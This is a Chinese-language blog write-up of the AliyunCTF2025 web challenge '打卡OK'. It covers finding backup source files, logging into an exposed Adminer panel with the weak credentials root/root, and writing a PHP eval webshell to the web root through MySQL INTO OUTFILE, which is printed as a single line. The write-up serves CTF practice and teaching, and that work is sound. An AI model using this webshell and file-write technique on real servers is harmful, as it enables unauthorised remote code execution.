文章目录

AliyunCTF2025-Web-打卡OK

由 Polze Li 发布

打卡ok

题目描述:没写好的系统怎么会打卡ok呢\~

进入靶机,提示登录。进入登陆界面

AliyunCTF2025-Web-打卡OK

dirsearch扫描发现/index.php~可以查看源码

AliyunCTF2025-Web-打卡OK

打开index.php~,然后下翻发现

AliyunCTF2025-Web-打卡OK

这里background逻辑会到cachefile然后访问一个ok.php~,我们尝试访问

AliyunCTF2025-Web-打卡OK

发现adminer,我们进入

AliyunCTF2025-Web-打卡OK

尝试弱口令root/root

成功登陆,查看是mysql,直接考虑sql写马,写入一句话木马进入/var/www/html/cmd.php

select '<?php eval($_POST["cmd"]);?>' into outfile "/var/www/html/cmd.php";
SQL

AliyunCTF2025-Web-打卡OK

然后蚁剑连接cmd.php的webshell,然后得到flag

版权所有:lzz0403的技术博客
文章标题:AliyunCTF2025-Web-打卡OK
文章链接:https://cnup.top/?post=107
本站文章均为原创,未经授权请勿用于任何商业用途

0条评论

发表评论

验证码